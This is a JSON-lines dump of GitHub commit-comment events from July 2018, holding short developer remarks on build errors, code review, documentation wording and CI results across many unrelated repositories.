{"id":"8010757932","type":"CommitCommentEvent","actor":{"login":"spgenius"},"repo":{"name":"spgenius/Sentiment-Analysis"},"payload":{"comment":{"id":29815581,"position":null,"line":null,"path":null,"commit_id":"4b7d208c82b309ce36b2ff8485cf6d8d2c90d4bf","created_at":"2018-07-24T14:56:31Z","updated_at":"2018-07-24T14:56:31Z","author_association":"OWNER","body":"Sentiment Prediction of Tweets of Twitter Using Naive Bayes Classifier with  Hadoop"}},"created_at":"2018-07-24T14:56:31Z"}
{"id":"8010760942","type":"CommitCommentEvent","actor":{"login":"DoccyB"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29815585,"position":null,"line":null,"path":null,"commit_id":"22ca48a8b05249765decc9a0a80db91133997057","created_at":"2018-07-24T14:56:57Z","updated_at":"2018-07-24T14:56:57Z","author_association":"OWNER","body":"*the API will not work - the map displays but not the points.\n\n\nOn 24 July 2018 at 15:55, TJB <tjbergquist@googlemail.com> wrote:\n\n> Struggling with moving database.php to the helpers directory.\n>\n> i git mv it and change the path in controller.php, all works except for\n> the map.\n>\n> I change the path in API.php and the map will still not work:\n>\n>\n>\n>\n> thoughts?\n>\n> On 24 July 2018 at 14:34, Martin <notifications@github.com> wrote:\n>\n>> You need to avoid that hard-coded path. Just make it relative, i.e. ../\n>> kind of thing.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/DoccyB/cycledata/commit/22ca48a8b05249765decc9a0a80db91133997057#commitcomment-29814293>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AXIQ3KbahbUiQ7a3Ymu8iZHNwQcIY01Qks5uJyJSgaJpZM4Vcv-n>\n>> .\n>>\n>\n>\n"}},"created_at":"2018-07-24T14:56:57Z"}
{"id":"8010767677","type":"CommitCommentEvent","actor":{"login":"ElementalCrisis"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29815598,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T14:57:56Z","updated_at":"2018-07-24T14:57:56Z","author_association":"MEMBER","body":"I've said this before but @bigretromike you shoudk hop on Discord more often so you know ahead of time what's being worked on and the general direction of the project."}},"created_at":"2018-07-24T14:57:56Z"}
{"id":"8010769290","type":"CommitCommentEvent","actor":{"login":"Morganamilo"},"repo":{"name":"excalibur1234/pacui"},"payload":{"comment":{"id":29815602,"position":null,"line":null,"path":null,"commit_id":"33c26704c7be8cfa3c09d1b9c019921ca4530b4e","created_at":"2018-07-24T14:58:11Z","updated_at":"2018-07-24T14:58:11Z","author_association":"NONE","body":"`Yay -Cd` was changed to `yay -Yc` over 6 months ago.\r\n\r\n```\r\nYay specific options:\r\n    -c --clean            Remove unneeded dependencies\r\n```"}},"created_at":"2018-07-24T14:58:11Z"}
{"id":"8010773945","type":"CommitCommentEvent","actor":{"login":"xiaohanxiao"},"repo":{"name":"liuruoze/EasyPR"},"payload":{"comment":{"id":29815612,"position":39,"line":39,"path":".github/ISSUE_TEMPLATE.md","commit_id":"d695f7fd742bca7925aea4a36c5e1e011629c613","created_at":"2018-07-24T14:58:50Z","updated_at":"2018-07-24T14:58:50Z","author_association":"NONE","body":"opencv 3.41"}},"created_at":"2018-07-24T14:58:50Z"}
{"id":"8010776075","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29815624,"position":null,"line":null,"path":null,"commit_id":"b190cdc5cffa45ee2eaa1641504451bfcf5ced41","created_at":"2018-07-24T14:59:10Z","updated_at":"2018-07-24T14:59:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [fix(Registro SOS): error de actualización en perfil de usuario](https://trello.com/c/FypXuovg/16-fixregistro-sos-error-de-actualizaci%C3%B3n-en-perfil-de-usuario)"}},"created_at":"2018-07-24T14:59:10Z"}
{"id":"8010779502","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"maelle/simplymaelle"},"payload":{"comment":{"id":29815634,"position":null,"line":null,"path":null,"commit_id":"4b301ee195cc43ce031a03e99a6cff5563f9711e","created_at":"2018-07-24T14:59:40Z","updated_at":"2018-07-24T14:59:40Z","author_association":"NONE","body":"😄 "}},"created_at":"2018-07-24T14:59:40Z"}
{"id":"8010782214","type":"CommitCommentEvent","actor":{"login":"xiaohanxiao"},"repo":{"name":"liuruoze/EasyPR"},"payload":{"comment":{"id":29815643,"position":39,"line":39,"path":".github/ISSUE_TEMPLATE.md","commit_id":"d695f7fd742bca7925aea4a36c5e1e011629c613","created_at":"2018-07-24T15:00:05Z","updated_at":"2018-07-24T15:00:05Z","author_association":"NONE","body":"严重性\t代码\t说明\t项目\t文件\t行\t禁止显示状态\r\n错误\tLNK1181\t无法打开输入文件“D:\\EasyPR-master\\x64\\Debug\\libeasypr.lib”\tdemo\tD:\\EasyPR-master\\vcprojs\\LINK\t1\t\r\n严重性\t代码\t说明\t项目\t文件\t行\t禁止显示状态\r\n错误\tC2039\t“channels”: 不是“cv::DataType<_Tp>”的成员\tlibeasypr\tc:\\opencv\\build\\include\\opencv2\\core\\mat.inl.hpp\t1107\t\r\n严重性\t代码\t说明\t项目\t文件\t行\t禁止显示状态\r\n错误\tC3867\t“cv::Mat::channels”: 非标准语法；请使用 \"&\" 来创建指向成员的指针\tlibeasypr\tc:\\opencv\\build\\include\\opencv2\\core\\mat.inl.hpp\t1107\t\r\n严重性\t代码\t说明\t项目\t文件\t行\t禁止显示状态\r\n错误\tC2297\t“*”: 非法，右操作数包含“int (__cdecl cv::Mat::* )(void) const”类型\tlibeasypr\tc:\\opencv\\build\\include\\opencv2\\core\\mat.inl.hpp\t1107\t\r\n严重性\t代码\t说明\t项目\t文件\t行\t禁止显示状态\r\n错误\tC2039\t“depth”: 不是“cv::DataType<_Tp>”的成员\tlibeasypr\tc:\\opencv\\build\\include\\opencv2\\core\\traits.hpp\t362\t\r\nopencv3.4.1  求大神解决  谢谢谢谢\r\n"}},"created_at":"2018-07-24T15:00:05Z"}
{"id":"8010782745","type":"CommitCommentEvent","actor":{"login":"tabeth"},"repo":{"name":"tabeth/node-xhrstub"},"payload":{"comment":{"id":29815644,"position":null,"line":null,"path":null,"commit_id":"7dac57afd4b8f7c4a9419ce5fb0a15a0346623ad","created_at":"2018-07-24T15:00:11Z","updated_at":"2018-07-24T15:00:11Z","author_association":"OWNER","body":"Closes #10 "}},"created_at":"2018-07-24T15:00:11Z"}
{"id":"8010783227","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"BAM-PFA/pymm"},"payload":{"comment":{"id":29815645,"position":357,"line":237,"path":"ingestfile.py","commit_id":"efff2dd52c14a138b999c48e946c9a2b408d679c","created_at":"2018-07-24T15:00:15Z","updated_at":"2018-07-24T15:00:15Z","author_association":"CONTRIBUTOR","body":"lol"}},"created_at":"2018-07-24T15:00:15Z"}
{"id":"8010784626","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815651,"position":25,"line":1342,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T15:00:25Z","updated_at":"2018-07-24T15:00:25Z","author_association":"COLLABORATOR","body":"You don't even need to have Athens in your realm. Justinian had."}},"created_at":"2018-07-24T15:00:25Z"}
{"id":"8010785204","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815652,"position":28,"line":1345,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T15:00:30Z","updated_at":"2018-07-24T15:00:30Z","author_association":"COLLABORATOR","body":"See above."}},"created_at":"2018-07-24T15:00:30Z"}
{"id":"8010787534","type":"CommitCommentEvent","actor":{"login":"vrushit"},"repo":{"name":"vrushit/Basketball-Game-Points-Calculator"},"payload":{"comment":{"id":29815655,"position":2,"line":2,"path":"README.md","commit_id":"d300ef3063e8c53ad447786bf4d05e7b473155c3","created_at":"2018-07-24T15:00:49Z","updated_at":"2018-07-24T15:00:49Z","author_association":"OWNER","body":"made with androidStudio"}},"created_at":"2018-07-24T15:00:49Z"}
{"id":"8010788482","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29815658,"position":null,"line":null,"path":null,"commit_id":"4e8040b78a04d7011e83c37cecf92750b0eb4a81","created_at":"2018-07-24T15:00:57Z","updated_at":"2018-07-24T15:00:57Z","author_association":"NONE","body":"Yet another remark on line 114:\r\n`- and so the level is what you would expect for a prime of double the size.`\r\n`+ and so the level is what you would expect for a key of double the size.`"}},"created_at":"2018-07-24T15:00:57Z"}
{"id":"8010795352","type":"CommitCommentEvent","actor":{"login":"GamakCZ"},"repo":{"name":"AcidProxy/Acid"},"payload":{"comment":{"id":29815669,"position":7,"line":7,"path":"src/proxy/command/DefaultCommand.php","commit_id":"12060144794dd92cc04def603443f81605555a69","created_at":"2018-07-24T15:01:55Z","updated_at":"2018-07-24T15:01:55Z","author_association":"CONTRIBUTOR","body":"K čemu? "}},"created_at":"2018-07-24T15:01:55Z"}
{"id":"8010797221","type":"CommitCommentEvent","actor":{"login":"rondale-sc"},"repo":{"name":"lytics/ember-data-model-fragments"},"payload":{"comment":{"id":29815679,"position":null,"line":null,"path":null,"commit_id":"f47f2bf0ac5bd962b926b5b2463f472f1bcf9b69","created_at":"2018-07-24T15:02:11Z","updated_at":"2018-07-24T15:02:11Z","author_association":"CONTRIBUTOR","body":"@jakesjews This has caused me some trouble.  Seems as if that import was only added to https://github.com/ember-cli/ember-rfc176-data in 0.3.3 which ember data's version of babel doesn't specify yet.  So on a new project we only get 0.2.7 of that repo. :("}},"created_at":"2018-07-24T15:02:11Z"}
{"id":"8010802579","type":"CommitCommentEvent","actor":{"login":"youhour"},"repo":{"name":"open-power/vpdtools"},"payload":{"comment":{"id":29815689,"position":48,"line":48,"path":"examples/p9/openbmc/openPower_obmc_opfr_record.xml","commit_id":"0792c52015f3ff1c7186f0ac8b48b109c54df0a1","created_at":"2018-07-24T15:02:59Z","updated_at":"2018-07-24T15:02:59Z","author_association":"CONTRIBUTOR","body":"Ops.  My first thought was relate to processor FRU...  Any way, I do not have control over the access list.\r\n"}},"created_at":"2018-07-24T15:02:59Z"}
{"id":"8010803361","type":"CommitCommentEvent","actor":{"login":"Kangz"},"repo":{"name":"gpuweb/WHLSL"},"payload":{"comment":{"id":29815695,"position":19,"line":24,"path":"Spec/source/index.rst","commit_id":"42cffb8f564054991e51fe12f04719c85481e094","created_at":"2018-07-24T15:03:06Z","updated_at":"2018-07-24T15:03:06Z","author_association":"NONE","body":"I'd refrain from making such statements since the group hasn't taken a decision on this. ditto in [1]"}},"created_at":"2018-07-24T15:03:06Z"}
{"id":"8010804327","type":"CommitCommentEvent","actor":{"login":"MediaBayStudio"},"repo":{"name":"MediaBayStudio/hunter"},"payload":{"comment":{"id":29815698,"position":null,"line":null,"path":null,"commit_id":"7392726547fdb4b1f94c1837eccb386a503aeffd","created_at":"2018-07-24T15:03:14Z","updated_at":"2018-07-24T15:03:14Z","author_association":"OWNER","body":"Update README.md"}},"created_at":"2018-07-24T15:03:14Z"}
{"id":"8010810614","type":"CommitCommentEvent","actor":{"login":"neworderofjamie"},"repo":{"name":"genn-team/genn"},"payload":{"comment":{"id":29815722,"position":36,"line":36,"path":"lib/include/currentSource.h","commit_id":"1647967f5eb45e8cd16046cc1cfc601bfe036a3a","created_at":"2018-07-24T15:04:10Z","updated_at":"2018-07-24T15:04:10Z","author_association":"CONTRIBUTOR","body":"This isn't necessary - in GeNN 4 I'll be removing these methods in favour of ``setVarMode``"}},"created_at":"2018-07-24T15:04:10Z"}
{"id":"8010811995","type":"CommitCommentEvent","actor":{"login":"Cr3atable"},"repo":{"name":"HunterKing/NSWDBot"},"payload":{"comment":{"id":29815724,"position":null,"line":null,"path":null,"commit_id":"4cb29371e9c0fb8a86b7632c2f82472c99545fe1","created_at":"2018-07-24T15:04:21Z","updated_at":"2018-07-24T15:04:21Z","author_association":"NONE","body":"Terrible implementation. Rather than just filtering things, embed literally everything. Embeds don't support mentions."}},"created_at":"2018-07-24T15:04:21Z"}
{"id":"8010813294","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815729,"position":25,"line":1342,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T15:04:33Z","updated_at":"2018-07-24T15:04:33Z","author_association":"OWNER","body":"I can change it to an AND with the county for the two latter."}},"created_at":"2018-07-24T15:04:33Z"}
{"id":"8010814196","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29815734,"position":14,"line":94,"path":"ivy-overlay.el","commit_id":"13d528e406d1a8d33be71762df14fde03d755c45","created_at":"2018-07-24T15:04:42Z","updated_at":"2018-07-24T15:04:42Z","author_association":"OWNER","body":"Thanks, fixed."}},"created_at":"2018-07-24T15:04:42Z"}
{"id":"8010814348","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29815736,"position":12,"line":49,"path":"test/remittance.js","commit_id":"14c15594afebb495e943b67ae4448ce49892d5e3","created_at":"2018-07-24T15:04:43Z","updated_at":"2018-07-24T15:04:43Z","author_association":"OWNER","body":"@robhitchens @xavierlepretre - Do you have any idea why instance is \"undefined\" if I run the tests ? If I replay the sequence of commands in a truffle-develop session, I don't have any problems and can successfully create the factory and also remittances though the factory"}},"created_at":"2018-07-24T15:04:43Z"}
{"id":"8010814430","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815738,"position":28,"line":1345,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T15:04:44Z","updated_at":"2018-07-24T15:04:44Z","author_association":"OWNER","body":"As above."}},"created_at":"2018-07-24T15:04:44Z"}
{"id":"8010818092","type":"CommitCommentEvent","actor":{"login":"stamelions"},"repo":{"name":"stamelions/beego"},"payload":{"comment":{"id":29815750,"position":null,"line":null,"path":null,"commit_id":"26a8ec79b0a573c6191f275a18baec63bdfe4929","created_at":"2018-07-24T15:05:16Z","updated_at":"2018-07-24T15:05:16Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n\r\n<html>\r\n<head>\r\n  <title>首页 - 我的 beego 博客</title>\r\n  <div class=\"awk\">\r\n    .awk{\r\n        min-height: 52px;\r\n      }\r\n  </div>\r\n  <link rel=\"shortcut icon\" href=\"/static/img/\">\r\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"/static/css/bootstrap.min.css\">\r\n</head>\r\n<body>\r\n  <div class=\"navbar navbar-default navbar-fixed-top\">\r\n    <div class=\"container\">\r\n      <a class=\"navbar-brand\" href=\"\">我的博客</a>\r\n      <ul class=\"nav navbar-nav\">\r\n        <li class=\"active\"><a href=\"/\">首页</a></li>\r\n        <li><a href=\"/category\">分类</a></li>\r\n        <li><a href=\"/topic\">文章</a></li>\r\n      </ul>\r\n    </div>\r\n  </div>\r\n  <div class=\"container\">\r\n    <div class=\"page-header\">\r\n      <h1>我的一篇博客</h1>\r\n      <h6 class=\"text-muted\">文章发表于 2018 年 7 月 22日 22 点 54 分，共有 0 次浏览， 0 个评论</h6>\r\n      <p>\r\n        今天，完成了简易的单人博客。\r\n      </p>\r\n    </div>\r\n  </div>\r\n</body>\r\n</html>"}},"created_at":"2018-07-24T15:05:16Z"}
{"id":"8010823092","type":"CommitCommentEvent","actor":{"login":"ofirnk"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29815760,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T15:06:00Z","updated_at":"2018-07-24T15:06:00Z","author_association":"NONE","body":"This polish indeed breaks `pushgateway` integration as of `v1.0.6` :\r\n\r\n```\r\nAn error has occurred during metrics collection:\r\n\r\ngathered metric family process_start_time_seconds has help \"Start time of the process since unix epoch.\" but should have \"Start time of the process since unix epoch in seconds.\"\r\n```\r\nWhich results in HTTP 500 error when pulling metrics from the gateway"}},"created_at":"2018-07-24T15:06:00Z"}
{"id":"8010823712","type":"CommitCommentEvent","actor":{"login":"rondale-sc"},"repo":{"name":"lytics/ember-data-model-fragments"},"payload":{"comment":{"id":29815761,"position":null,"line":null,"path":null,"commit_id":"f47f2bf0ac5bd962b926b5b2463f472f1bcf9b69","created_at":"2018-07-24T15:06:06Z","updated_at":"2018-07-24T15:06:06Z","author_association":"CONTRIBUTOR","body":"https://github.com/ember-cli/ember-rfc176-data/issues/59#issuecomment-407161902\r\n\r\nFor more details"}},"created_at":"2018-07-24T15:06:06Z"}
{"id":"8010830333","type":"CommitCommentEvent","actor":{"login":"jonasreinsch"},"repo":{"name":"deltachat/deltachat-ios"},"payload":{"comment":{"id":29815769,"position":null,"line":null,"path":null,"commit_id":"dd6a468965501762dbd66563ad7c41472356f215","created_at":"2018-07-24T15:07:05Z","updated_at":"2018-07-24T15:07:05Z","author_association":"COLLABORATOR","body":"@r10s thanks! The source is also fully self-contained now, i.e. all dependencies are included after a git clone. So if you have a recent Xcode laying around, you should be able to build in 5 minutes."}},"created_at":"2018-07-24T15:07:05Z"}
{"id":"8010837819","type":"CommitCommentEvent","actor":{"login":"Tino037"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29815780,"position":35,"line":36,"path":"Ratatoullie/src/main/webapp/WEB-INF/pages/restaurantForm.jsp","commit_id":"3d293fb741659d16e2ed228093be9aa4fabeb3ae","created_at":"2018-07-24T15:08:13Z","updated_at":"2018-07-24T15:08:13Z","author_association":"COLLABORATOR","body":"Yo intenté hacerlo con un forEach y un c:out y tampoco me andvuo. No tiraba error pero no traía datos.\r\n\r\nUna solución es en el toString ponerle un getName, ahí devuelve los nombres. Pero no sería el uso adecuado, no me gusta esa solución.\r\nSeguiré buscando"}},"created_at":"2018-07-24T15:08:13Z"}
{"id":"8010839518","type":"CommitCommentEvent","actor":{"login":"tyz51"},"repo":{"name":"klim31/AutoTasks"},"payload":{"comment":{"id":29815784,"position":12,"line":12,"path":"src/test/java/scenarios/ws/WsNegativeScenario.java","commit_id":"19e9499c90fccf340a418263d89bd364905d9919","created_at":"2018-07-24T15:08:27Z","updated_at":"2018-07-24T15:08:27Z","author_association":"NONE","body":"Please follow the code contact  - use upper case for constant"}},"created_at":"2018-07-24T15:08:27Z"}
{"id":"8010841027","type":"CommitCommentEvent","actor":{"login":"OrdinaryMagician"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29815787,"position":null,"line":null,"path":null,"commit_id":"280dd765e57b650b10a8ab5a2faeec860a4d6ef8","created_at":"2018-07-24T15:08:40Z","updated_at":"2018-07-24T15:08:40Z","author_association":"CONTRIBUTOR","body":"> No need to replace all `NULL with `nullptr`, just use `nullptr` in new code and replace it in modified code only\r\n\r\nIt seems ugly to mix `NULL` and `nullptr` in the same code, so I decided on replacing all the others too\r\n\r\n> The primary purpose of a member function was to avoid global variables. Library handle and function pointer could become class members. Sorry, I didn't mention this initially\r\n\r\nI can do that one\r\n\r\n> Those ugly pointer-to-function declaration and cast can be replaced with `typedef` (or `using` if you prefer modern C++). Previously I missed that too :disappointed:\r\n\r\nWhere would I put the `typedef` in this case (also I've never used `using` before so I have no idea how to, I'm a C programmer)\r\n\r\n> Two arguments of `GetWindowBordersSize()` are never used, what's the point of them? You can pass them by reference to avoid checking for `nullptr`\r\n\r\nHaving those two extra parameters don't make much sense now, but maybe someday it'll be necessary. I guess it's fine that I remove them now though. Also, pass by reference?\r\n\r\n> And I really don't like `if (!a) { b; } else { c; }`, it should be `if (a) { c; } else { b; }`. It's OK to use negation in `if` with true branch only but with both branches it's harder to understand\r\n\r\nIf you mean the if-else with `!= nullptr`, I find that this order makes \"more sense\" to me. In human language it's something along the lines of `if X exists, do Y, otherwise do Z`. But I guess I can rearrange it"}},"created_at":"2018-07-24T15:08:40Z"}
{"id":"8010841185","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29815788,"position":null,"line":null,"path":null,"commit_id":"d6eef772ab0cec27d0d814f904365611383f7808","created_at":"2018-07-24T15:08:42Z","updated_at":"2018-07-24T15:08:42Z","author_association":"COLLABORATOR","body":"oops should have caught that..... too many pies, not enough fingers"}},"created_at":"2018-07-24T15:08:42Z"}
{"id":"8010842815","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29815789,"position":null,"line":null,"path":null,"commit_id":"610485faa7f8c043482c4a9c030938ed315557e5","created_at":"2018-07-24T15:08:55Z","updated_at":"2018-07-24T15:08:55Z","author_association":"MEMBER","body":"This works better\r\nhttps://github.com/FRidh/nixpkgs/commit/4b14e27edcb7188e5e8c82a583901ffedd42def1"}},"created_at":"2018-07-24T15:08:55Z"}
{"id":"8010844791","type":"CommitCommentEvent","actor":{"login":"tyz51"},"repo":{"name":"klim31/AutoTasks"},"payload":{"comment":{"id":29815791,"position":29,"line":29,"path":"src/test/java/scenarios/ws/WsNegativeScenario.java","commit_id":"19e9499c90fccf340a418263d89bd364905d9919","created_at":"2018-07-24T15:09:13Z","updated_at":"2018-07-24T15:09:13Z","author_association":"NONE","body":"Use logger instead of println (if you have :))"}},"created_at":"2018-07-24T15:09:13Z"}
{"id":"8010846254","type":"CommitCommentEvent","actor":{"login":"kmruddy"},"repo":{"name":"vmware/vsphere-automation-sdk-rest"},"payload":{"comment":{"id":29815795,"position":null,"line":null,"path":null,"commit_id":"9ecd8922bacc51266563eab9e207b1b64494e667","created_at":"2018-07-24T15:09:25Z","updated_at":"2018-07-24T15:09:25Z","author_association":"NONE","body":"Signed-off-by: Kyle Ruddy kmruddy@users.noreply.github.com"}},"created_at":"2018-07-24T15:09:25Z"}
{"id":"8010847991","type":"CommitCommentEvent","actor":{"login":"xeraa"},"repo":{"name":"aaronoah/kibana_calendar_vis"},"payload":{"comment":{"id":29815798,"position":null,"line":null,"path":null,"commit_id":"747b75687849c3f458e8981403c0e2a6b7cbebd6","created_at":"2018-07-24T15:09:40Z","updated_at":"2018-07-24T15:09:40Z","author_association":"NONE","body":"@aaronoah I kind of miss the actual steps to get the project up and running. Like clone this branch of Kibana, put master of this repo in folder X, run command X, Y, Z, etc. This might also be my lack of Kibana knowledge, but I assume more people will need this information for the installation.\r\n\r\nOr will this change before the end of GSoC? As in\r\n\r\n* you will provide a packaged plugin\r\n* or cutting the 6.4 branch will change this considerably.\r\n\r\nThen I’m totally fine with waiting and describing that final process. But right now I'm missing the concrete steps a bit.\r\n\r\nPS: Feel free to transfer this into an issue if that makes more sense for you."}},"created_at":"2018-07-24T15:09:40Z"}
{"id":"8010848735","type":"CommitCommentEvent","actor":{"login":"tyz51"},"repo":{"name":"klim31/AutoTasks"},"payload":{"comment":{"id":29815800,"position":20,"line":20,"path":"src/test/java/scenarios/ws/WsPositiveScenario.java","commit_id":"19e9499c90fccf340a418263d89bd364905d9919","created_at":"2018-07-24T15:09:46Z","updated_at":"2018-07-24T15:09:46Z","author_association":"NONE","body":"Remove wrong comment :)"}},"created_at":"2018-07-24T15:09:46Z"}
{"id":"8010848971","type":"CommitCommentEvent","actor":{"login":"kmruddy"},"repo":{"name":"vmware/vsphere-automation-sdk-rest"},"payload":{"comment":{"id":29815801,"position":null,"line":null,"path":null,"commit_id":"50fc8270be428e300c750de320ff983e1556c3c8","created_at":"2018-07-24T15:09:49Z","updated_at":"2018-07-24T15:09:49Z","author_association":"NONE","body":"Signed-off-by: Kyle Ruddy kmruddy@users.noreply.github.com"}},"created_at":"2018-07-24T15:09:49Z"}
{"id":"8010849754","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29815802,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-24T15:09:56Z","updated_at":"2018-07-24T15:09:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T15:09:56Z"}
{"id":"8010850194","type":"CommitCommentEvent","actor":{"login":"kmruddy"},"repo":{"name":"vmware/vsphere-automation-sdk-rest"},"payload":{"comment":{"id":29815803,"position":null,"line":null,"path":null,"commit_id":"39c0fb71a39b1153cae947d6ab4783b91e83aa7b","created_at":"2018-07-24T15:09:59Z","updated_at":"2018-07-24T15:09:59Z","author_association":"NONE","body":"Signed-off-by: Kyle Ruddy kmruddy@users.noreply.github.com"}},"created_at":"2018-07-24T15:09:59Z"}
{"id":"8010852705","type":"CommitCommentEvent","actor":{"login":"RLCHHABRA"},"repo":{"name":"RLCHHABRA/Book-Repository-with-Shopping-Cart"},"payload":{"comment":{"id":29815808,"position":null,"line":null,"path":null,"commit_id":"ef0f572a4263180856dfd16ecf9032735afc2ad4","created_at":"2018-07-24T15:10:22Z","updated_at":"2018-07-24T15:10:22Z","author_association":"OWNER","body":"I am just tryiing"}},"created_at":"2018-07-24T15:10:22Z"}
{"id":"8010858312","type":"CommitCommentEvent","actor":{"login":"PerikiyoXD"},"repo":{"name":"TranslateTheSpire/sts_localization_spanish"},"payload":{"comment":{"id":29815813,"position":null,"line":null,"path":null,"commit_id":"2a550d35a9ccb2c7712e793d9b3272195e09771a","created_at":"2018-07-24T15:11:16Z","updated_at":"2018-07-24T15:11:16Z","author_association":"MEMBER","body":"Los efectos deben empezar por mayúscula.\r\n\r\nIE: armadura de placas -> Armadura de Placas"}},"created_at":"2018-07-24T15:11:16Z"}
{"id":"8010860265","type":"CommitCommentEvent","actor":{"login":"tyz51"},"repo":{"name":"klim31/AutoTasks"},"payload":{"comment":{"id":29815817,"position":62,"line":62,"path":"src/test/java/services/WsService.java","commit_id":"19e9499c90fccf340a418263d89bd364905d9919","created_at":"2018-07-24T15:11:34Z","updated_at":"2018-07-24T15:11:34Z","author_association":"NONE","body":"Think about extensible methods - messages.getString(0);  - not very conveniently for support"}},"created_at":"2018-07-24T15:11:34Z"}
{"id":"8010862972","type":"CommitCommentEvent","actor":{"login":"mdevan"},"repo":{"name":"rapidloop/pgmetrics"},"payload":{"comment":{"id":29815819,"position":12,"line":158,"path":"cmd/pgmetrics/main.go","commit_id":"cb41f94e47f00b24205883c626caf5593e486711","created_at":"2018-07-24T15:12:00Z","updated_at":"2018-07-24T15:12:00Z","author_association":"CONTRIBUTOR","body":"This should return nil for empty strings."}},"created_at":"2018-07-24T15:12:00Z"}
{"id":"8010867415","type":"CommitCommentEvent","actor":{"login":"mdevan"},"repo":{"name":"rapidloop/pgmetrics"},"payload":{"comment":{"id":29815826,"position":7,"line":115,"path":"collect.go","commit_id":"cb41f94e47f00b24205883c626caf5593e486711","created_at":"2018-07-24T15:12:41Z","updated_at":"2018-07-24T15:12:41Z","author_association":"CONTRIBUTOR","body":"This can also be just getRegexp, no need to export"}},"created_at":"2018-07-24T15:12:41Z"}
{"id":"8010871889","type":"CommitCommentEvent","actor":{"login":"ZaneReeder"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29815832,"position":null,"line":null,"path":null,"commit_id":"a31b5fed1f4caa5f18a5d9825075f372ad9f96ff","created_at":"2018-07-24T15:13:22Z","updated_at":"2018-07-24T15:13:22Z","author_association":"NONE","body":"@Hizqeelrz If I could give you an award I would. Very much appreciate the typo catch on their code that also existed in my code! "}},"created_at":"2018-07-24T15:13:22Z"}
{"id":"8010873428","type":"CommitCommentEvent","actor":{"login":"browner12"},"repo":{"name":"symfony/http-foundation"},"payload":{"comment":{"id":29815834,"position":null,"line":null,"path":null,"commit_id":"f3d7d66f0a2170372a20292a940a294f34302c8e","created_at":"2018-07-24T15:13:36Z","updated_at":"2018-07-24T15:13:36Z","author_association":"NONE","body":"can someone explain to me how this is not a BC break? you're changing the signature of the constructor on a minor release.   I understand you're trying to account for it with some additional logic in the constructor and throwing a deprecation notice, but to use this, we still **need** to use the old syntax to prevent errors.\r\n\r\nfor example, if I require `~4.0` in my project and create a file with the new signature in `4.1`, all of my users actually on `4.1` will be fine, but any of my users locked to `4.0` may run into errors."}},"created_at":"2018-07-24T15:13:36Z"}
